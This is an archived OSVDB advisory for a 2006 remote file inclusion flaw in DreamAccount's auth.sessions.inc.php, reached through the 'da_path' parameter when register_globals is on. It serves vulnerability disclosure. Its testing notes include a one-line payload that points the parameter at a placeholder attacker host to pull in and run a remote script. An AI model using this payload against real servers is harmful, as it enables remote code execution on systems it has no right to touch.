DreamAccount auth.sessions.inc.php da_path Variable Remote File Inclusion

2006-06-05T09:49:19
ID OSVDB:26170
Type osvdb
Reporter Aesthetico(admin@majorsecurity.de)
Modified 2006-06-05T09:49:19

Description

Vulnerability Description

DreamAccount contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to auth.sessions.inc.php script not properly sanitizing user input supplied to the 'da_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

DreamAccount contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to auth.sessions.inc.php script not properly sanitizing user input supplied to the 'da_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

Post data:

da_path=http://[attacker]/yourscript.php?

References:

Vendor URL: http://dreamcost.com/ Secunia Advisory ID:20468 Related OSVDB ID: 26168 Related OSVDB ID: 26169 Other Advisory URL: http://www.majorsecurity.de/advisory/major_rls8.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0795.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0019.html Keyword: MajorSecurity #8 ISS X-Force ID: 26932 FrSIRT Advisory: ADV-2006-2152 CVE-2006-2881 Bugtraq ID: 18278